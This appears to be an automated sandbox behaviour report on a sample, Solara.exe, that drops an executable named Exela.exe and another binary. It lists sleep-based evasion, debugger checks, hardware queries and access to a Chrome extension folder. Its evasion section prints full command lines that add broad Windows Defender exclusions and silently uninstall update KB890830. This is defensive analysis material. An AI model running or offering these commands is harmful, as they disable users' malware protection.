                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\conhost.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
                Source: C:\Users\user\Desktop\Solara.exe | Memory allocated: 1FF0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Solara.exe | Memory allocated: 1BC80000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Solara.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5779
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4034
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7412
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1977
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6732
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2472
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7724
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1764
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2142
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1158
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5013
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70882\_socket.pyd
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70882\cryptography\hazmat\bindings\_rust.pyd
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe | Dropped PE file which has not been started: C:\Windows\Temp\ypynqohyxqjk.sys
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70882\_multiprocessing.pyd
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70882\_lzma.pyd
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70882\python310.dll
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp\_websocket\mask.cp310-win_amd64.pyd
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70882\_uuid.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp\_http_parser.cp310-win_amd64.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70882\_sqlite3.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70882\pyexpat.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70882\yarl\_quoting_c.cp310-win_amd64.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70882\_decimal.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70882\_asyncio.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70882\python3.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70882\_queue.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70882\_cffi_backend.cp310-win_amd64.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70882\frozenlist\_frozenlist.cp310-win_amd64.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70882\select.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70882\_ssl.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70882\unicodedata.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp\_websocket\reader_c.cp310-win_amd64.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70882\_bz2.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70882\_overlapped.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70882\propcache\_helpers_c.cp310-win_amd64.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70882\_hashlib.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp\_http_writer.cp310-win_amd64.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70882\_ctypes.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI70882\multidict\_multidict.cp310-win_amd64.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_76-18228
                Source: C:\Windows\System32\conhost.exeAPI coverage: 0.9 %
                Source: C:\Users\user\Desktop\Solara.exe TID: 6920Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4300Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3028Thread sleep count: 7412 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2860Thread sleep count: 1977 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5892Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6740Thread sleep count: 6732 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6740Thread sleep count: 2472 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6004Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4904Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4504Thread sleep count: 7724 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1660Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3172Thread sleep count: 1764 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6136Thread sleep count: 2142 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6136Thread sleep count: 1158 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1464Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5688Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5976Thread sleep count: 5013 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4504Thread sleep time: -2767011611056431s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5700Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 76_2_00007FF75AE983B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,76_2_00007FF75AE983B0
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 76_2_00007FF75AE992F0 FindFirstFileExW,FindClose,76_2_00007FF75AE992F0
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 76_2_00007FF75AEB18E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,76_2_00007FF75AEB18E4
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 77_2_00007FF75AE992F0 FindFirstFileExW,FindClose,77_2_00007FF75AE992F0
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 77_2_00007FF75AE983B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,77_2_00007FF75AE983B0
                Source: C:\Users\user\Desktop\Solara.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 76_2_00007FF75AE9D19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,76_2_00007FF75AE9D19C
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 77_2_00007FFB084A3230 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,77_2_00007FFB084A3230
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 76_2_00007FF75AEB34F0 GetProcessHeap,76_2_00007FF75AEB34F0
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Windows\System32\conhost.exeCode function: 64_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,64_2_0000000140001160
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 76_2_00007FF75AE9D37C SetUnhandledExceptionFilter,76_2_00007FF75AE9D37C
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 76_2_00007FF75AE9D19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,76_2_00007FF75AE9D19C
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 76_2_00007FF75AE9C910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,76_2_00007FF75AE9C910
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 76_2_00007FF75AEAA684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,76_2_00007FF75AEAA684
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 77_2_00007FFB08036050 SetUnhandledExceptionFilter,77_2_00007FFB08036050
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 77_2_00007FFB08033048 IsProcessorFeaturePresent,00007FFB1C8119C0,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FFB1C8119C0,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,77_2_00007FFB08033048
                Source: C:\Users\user\Desktop\Solara.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\Desktop\Solara.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe'
                Source: C:\Users\user\Desktop\Solara.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Exela.exe'
                Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                Source: C:\Users\user\Desktop\Solara.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe'
                Source: C:\Users\user\Desktop\Solara.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Exela.exe'
                Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                Source: C:\Users\user\Desktop\Solara.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe'
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe | Thread register set: target process: 5200
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe | Thread register set: target process: 4300
                Source: C:\Users\user\Desktop\Solara.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe'
                Source: C:\Users\user\Desktop\Solara.exe | Process created: C:\Users\user\AppData\Local\Temp\Solara.exe "C:\Users\user~1\AppData\Local\Temp\Solara.exe"
                Source: C:\Users\user\Desktop\Solara.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Exela.exe'
                Source: C:\Users\user\Desktop\Solara.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe | Process created: C:\Windows\System32\conhost.exe conhost.exe
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Process created: C:\Users\user\AppData\Local\Temp\Exela.exe "C:\Users\user~1\AppData\Local\Temp\Exela.exe"
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Process created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Process created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Process created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Process created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Process created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Process created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Process created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Process created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Process created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Process created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Process created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Process created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Process created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Process created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Process created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Process created: unknown unknown
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                Source: C:\Users\user\AppData\Local\Temp\Exela.exe | Code function: 76_2_00007FF75AEB95E0 cpuid 76_2_00007FF75AEB95E0
                Source: C:\Users\user\Desktop\Solara.exe | Queries volume information: C:\Users\user\Desktop\Solara.exe VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
